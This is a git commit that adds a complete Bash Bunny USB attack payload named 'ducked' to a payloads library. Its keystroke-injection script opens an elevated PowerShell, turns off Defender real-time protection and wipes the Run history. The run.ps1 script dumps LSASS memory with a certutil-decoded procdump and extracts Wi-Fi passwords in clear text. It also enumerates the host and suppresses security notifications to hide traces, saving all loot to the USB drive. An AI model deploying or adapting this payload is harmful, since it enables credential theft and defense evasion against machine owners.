Original from scaery/ducked (#456)

* Create procdump.txt * Create duck_code.txt * Create run.ps1 * Create payload.txt
2025-10-29 16:58:25 +00:00 · 2021-12-16 18:52:13 +01:00 · 2021-12-16 18:52:13 +01:00 · 9e54726597
commit 9e54726597
parent 0414f0cfc7
4 changed files with 13780 additions and 0 deletions
--- a/payloads/library/credentials/ducked/duck_code.txt
+++ b/payloads/library/credentials/ducked/duck_code.txt
@ -0,0 +1,38 @@
+DELAY 5000
+GUI d
+DELAY 1200
+GUI r
+DELAY 1200
+STRING powershell -nologo -noni -ep bypass
+CTRL-SHIFT ENTER
+DELAY 2000
+LEFT
+DELAY 1000
+ENTER
+DELAY 1000
+STRING mode con:cols=100 lines=1
+ENTER
+DELAY 500
+STRING Set-MpPreference -DisableRealtimeMonitoring $true
+ENTER
+DELAY 1000
+STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+ENTER
+DELAY 200
+STRING $usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name; powershell -nologo -noni -ep bypass -File $usb\payloads\switch1\run.ps1
+ENTER
+DELAY 35000
+STRING function eject {$driveEject = New-Object -comObject Shell.Application;$driveEject.Namespace(17).ParseName("$usb").InvokeVerb("Eject")}
+ENTER
+DELAY 1000
+STRING echo "Successful PWNd..."
+ENTER
+DELAY 1000
+STRING eject
+ENTER
+DELAY 1000
+STRING Set-MpPreference -DisableRealtimeMonitoring $false
+ENTER
+DELAY 1000
+STRING exit
+ENTER
--- a/payloads/library/credentials/ducked/payload.txt
+++ b/payloads/library/credentials/ducked/payload.txt
@ -0,0 +1,9 @@
+#!/bin/bash
+LED SETUP
+ATTACKMODE STORAGE HID VID_0X0D8C PID_0X0012
+LED ATTACK
+LED R B
+QUACK switch1/duck_code.txt
+sync;sleep 1;sync
+LED FINISH
+LED G
--- a/payloads/library/credentials/ducked/procdump.txt
+++ b/payloads/library/credentials/ducked/procdump.txt
--- a/payloads/library/credentials/ducked/run.ps1
+++ b/payloads/library/credentials/ducked/run.ps1
@ -0,0 +1,159 @@
+##                                                                ##
+##  Ducked script by scaery v.1.0                                 ##
+##  ________                 __              .___                 ##
+##  \______ \  __ __   ____ |  | __ ____   __| _/                 ##
+##   |    |  \|  |  \_/ ___\|  |/ // __ \ / __ |                  ##
+##   |    `   \  |  /\  \___|    <\  ___// /_/ |                  ##
+##  /_______  /____/  \___  >__|_ \\___  >____ |                  ##
+##          \/            \/     \/    \/     \/                  ##
+##                                                                ##
+##   Windows Enumeration - LSASS Dump - Wifi Credential Dumper    ##
+##                                                                ##
+####################################################################
+
+$switch = "switch1"
+$usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name
+$usb_loot = "loot\"
+$date = Get-Date -UFormat "%Y-%m-%d-%H-%M"
+$loot = $usb + $usb_loot + $env:computername + "_" + $date
+$usb_create = New-Item -ItemType directory $loot
+$proc = "$usb\payloads\$switch\procdump.txt"
+$proc_decode = certutil -decode $proc exec.exe
+$procdump = "$usb\payloads\$switch\exec.exe"
+$proc_run  = cmd.exe /c exec.exe -ma lsass.exe -accepteula "$loot\$date-lsass.$env:computername.dmp"
+$wifi = (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Out-File $loot\$date-wifidump.log
+
+$lines="------------------------------------------"
+function whost($a) {
+    Write-Host
+    Write-Host -ForegroundColor Green $lines
+    Write-Host -ForegroundColor Green " "$a 
+    Write-Host -ForegroundColor Green $lines
+}
+
+whost "Windows Enumeration Script v 0.1
+        original by absolomb 
+        modified by scaery
+            !!!!!!!!!"
+
+$commands = [ordered]@{
+    'Basic System Information'                    = 'Start-Process "systeminfo" -NoNewWindow -Wait';
+    'Environment Variables'                       = 'Get-ChildItem Env: | ft Key,Value';
+    'Network Information'                         = 'Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address';
+    'DNS Servers'                                 = 'Get-DnsClientServerAddress -AddressFamily IPv4 | ft';
+    'ARP cache'                                   = 'Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State';
+    'Routing Table'                               = 'Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex';
+    'Network Connections'                         = 'Start-Process "netstat" -ArgumentList "-ano" -NoNewWindow -Wait | ft';
+    'Connected Drives'                            = 'Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft';
+    'Firewall Config'                             = 'Start-Process "netsh" -ArgumentList "firewall show config" -NoNewWindow -Wait | ft';
+    'Current User'                                = 'Write-Host $env:UserDomain\$env:UserName';
+    'User Privileges'                             = 'start-process "whoami" -ArgumentList "/priv" -NoNewWindow -Wait | ft';
+    'Local Users'                                 = 'Get-LocalUser | ft Name,Enabled,LastLogon';
+    'Logged in Users'                             = 'Start-Process "qwinsta" -NoNewWindow -Wait | ft';
+    'Credential Manager'                          = 'start-process "cmdkey" -ArgumentList "/list" -NoNewWindow -Wait | ft'
+    'User Autologon Registry Items'               = 'Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" | select "Default*" | ft';
+    'Local Groups'                                = 'Get-LocalGroup | ft Name';
+    'Local Administrators EN'                     = 'Get-LocalGroupMember Administrators | ft Name, PrincipalSource';
+    'Local Administrators DE'                     = 'Get-LocalGroupMember Administratoren | ft Name, PrincipalSource';
+    'User Directories'                            = 'Get-ChildItem C:\Users | ft Name';
+    'Searching for SAM backup files'              = 'Test-Path %SYSTEMROOT%\repair\SAM ; Test-Path %SYSTEMROOT%\system32\config\regback\SAM';
+    'Running Processes'                           = 'gwmi -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize';
+    'Installed Software Directories'              = 'Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" | ft Parent,Name,LastWriteTime';
+    'Software in Registry'                        = 'Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name';
+    'Folders with Everyone Permissions'           = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}} | ft';
+    'Folders with BUILTIN\User Permissions'       = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "BUILTIN\Users"} } catch {}} | ft';
+    'Checking registry for AlwaysInstallElevated' = 'Test-Path -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" | ft';
+    'Unquoted Service Paths'                      = 'gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike ''"*''} | select PathName, DisplayName, Name | ft';
+    'Scheduled Tasks'                             = 'Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State';
+    'Tasks Folder'                                = 'Get-ChildItem C:\Windows\Tasks | ft';
+    'Startup Commands'                            = 'Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl';
+}
+
+function RunCommands($commands) {
+    ForEach ($command in $commands.GetEnumerator()) {
+        whost $command.Name
+        Invoke-Expression $command.Value
+    }
+}
+
+# Disable Notifications 
+
+New-Item HKCU:\Software\Policies\Microsoft\Windows\Explorer -Force
+$registryPath1 = "HKCU:\Software\Policies\Microsoft\Windows\Explorer"
+$Name1 = "DisableNotificationCenter"
+$value1 = "00000001"
+IF(!(Test-Path $registryPath1))  {
+    New-Item -Path $registryPath1 -Force | Out-Null
+    New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
+    -PropertyType DWORD -Force | Out-Null
+    } ELSE {
+    New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
+    -PropertyType DWORD -Force | Out-Null
+    }
+
+New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance -Force
+$registryPath2 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance"
+$Name2 = "Enabled"
+$value2 = "00000000"
+IF(!(Test-Path $registryPath2))  {
+    New-Item -Path $registryPath2 -Force | Out-Null
+    New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
+    -PropertyType DWORD -Force | Out-Null
+    } ELSE {
+    New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
+    -PropertyType DWORD -Force | Out-Null
+    }
+
+New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel -Force
+$registryPath3 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel"
+$Name3 = "Enabled"
+$value3 = "00000000"
+IF(!(Test-Path $registryPath3))  {
+    New-Item -Path $registryPath3 -Force | Out-Null
+    New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
+    -PropertyType DWORD -Force | Out-Null
+    } ELSE {
+    New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
+    -PropertyType DWORD -Force | Out-Null
+    }
+
+New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay -Force
+$registryPath4 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay"
+$Name4 = "Enabled"
+$value4 = "00000000"
+IF(!(Test-Path $registryPath4))  {
+    New-Item -Path $registryPath4 -Force | Out-Null
+    New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
+    -PropertyType DWORD -Force | Out-Null
+    } ELSE {
+    New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
+    -PropertyType DWORD -Force | Out-Null
+    }
+
+$notify_disable={
+Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 0
+}
+$notify_enable={
+Remove-Item $registryPath1 -Force  | Out-Null
+Remove-Item $registryPath2 -Force  | Out-Null
+Remove-Item $registryPath3 -Force  | Out-Null
+Remove-Item $registryPath4 -Force  | Out-Null
+Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 1
+}
+
+##################### EXECUTION STEPS ######################################
+
+Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
+
+Invoke-Command -Scriptblock $notify_disable
+
+RunCommands($commands) > $loot\$date-winenum.log
+
+whost "Procdump LSASS! AV-free! Caution: Not Defender aware!"
+$proc_run
+
+whost "Dumping Wifi Credentials to USB"
+$wifi
+
+whost "Hiding traces and notifications"
+Invoke-Command -Scriptblock $notify_enable